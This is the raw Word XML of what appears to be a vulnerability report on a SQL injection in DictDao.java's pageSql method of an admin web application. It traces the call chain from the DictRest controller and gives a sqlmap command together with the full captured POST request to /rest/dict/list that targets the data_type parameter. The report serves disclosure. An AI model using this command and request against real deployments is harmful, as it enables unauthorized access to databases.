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862" w:rsidRDefault="008463AE">
      <w:r w:rsidRPr="008463AE">
        <w:t>Vulnerability Details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D"/>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="008463AE">
      <w:r w:rsidRPr="008463AE">
        <w:t xml:space="preserve">The code audited the code under DictDao.java and found that its </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:t>pageSql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:t xml:space="preserve"> method directly splices </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:t xml:space="preserve"> statements</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA187D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54715B8E" wp14:editId="7DCE32EF">
            <wp:extent cx="4640093" cy="5215353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41248" cy="5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3AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D"/>
    <w:p w:rsidR="00FA187D" w:rsidRPr="008463AE" w:rsidRDefault="008463AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The vulnerable code has the following call chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>ictRest.ResponseResult()-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dict</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ervice</w:t>
      </w:r>
      <w:r>
        <w:t>.queryPage()-&gt;Dict.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>elcetPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>)-&gt;Dict.pageSql()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D"/>
    <w:p w:rsidR="008463AE" w:rsidRDefault="008463AE" w:rsidP="008463AE">
      <w:r>
        <w:t xml:space="preserve">Among them, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DictRest.ResponseResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() is the controller layer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and the parameters of its method are controllable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="008463AE" w:rsidP="008463AE">
      <w:r>
        <w:t>The following is the function call diagram from the Controller layer to the Dao layer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA187D" w:rsidRDefault="00FA187D">
      <w:r w:rsidRPr="00FA187D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3983B632" wp14:editId="519F46CF">
            <wp:extent cx="5270500" cy="12744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D" w:rsidRDefault="00FA187D">
      <w:r w:rsidRPr="00FA187D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A58C4B3" wp14:editId="2692D09E">
            <wp:extent cx="4533900" cy="1079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D" w:rsidRDefault="00FA187D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA187D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46280919" wp14:editId="3E9DBEF6">
            <wp:extent cx="5270500" cy="60604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D" w:rsidRDefault="00FA187D"/>
    <w:p w:rsidR="00FA187D" w:rsidRPr="008463AE" w:rsidRDefault="008463AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC">
      <w:r w:rsidRPr="00B33FAC">
        <w:t xml:space="preserve">sqlmap.py -r 123.txt -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B33FAC">
        <w:t>data_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC"/>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="008463AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>123.txt is the vulnerability package, as follows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008463AE" w:rsidRPr="008463AE" w:rsidRDefault="008463AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST /rest/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/list HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Host: 127.0.0.1:8888</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Accept: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, text/plain, */*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zh-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CN,zh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRPr="008463AE" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Content-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>json;charset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRPr="008463AE" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>LinkAdmin-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> YmYWec6xYwDVnVWyCxeUUg==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Content-Length: 46</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Origin: http://127.0.0.1:8888</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRPr="008463AE" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>: http://127.0.0.1:8888/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRPr="008463AE" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Sec-Fetch-Dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t xml:space="preserve">Sec-Fetch-Mode: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:r>
        <w:t>Sec-Fetch-Site: same-origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC"/>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33FAC">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{"page":1,"limit":10,"data_type":"data_scope"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRDefault="008463AE" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008463AE">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> screenshot</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B33FAC" w:rsidRPr="00B33FAC" w:rsidRDefault="00B33FAC" w:rsidP="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33FAC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65802C6B" wp14:editId="218596D2">
            <wp:extent cx="5270500" cy="19704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AC" w:rsidRPr="00B33FAC" w:rsidRDefault="00B33FAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B33FAC" w:rsidRPr="00B33FAC" w:rsidSect="00A4556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87D"/>
    <w:rsid w:val="004E5862"/>
    <w:rsid w:val="008463AE"/>
    <w:rsid w:val="00A45568"/>
    <w:rsid w:val="00B33FAC"/>
    <w:rsid w:val="00FA1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9BED78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{19EF7FE4-8DBD-DF4B-B9F4-F985FA37F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60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182</Words>
  <Characters>1042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2022-03-15T10:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-17T08:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>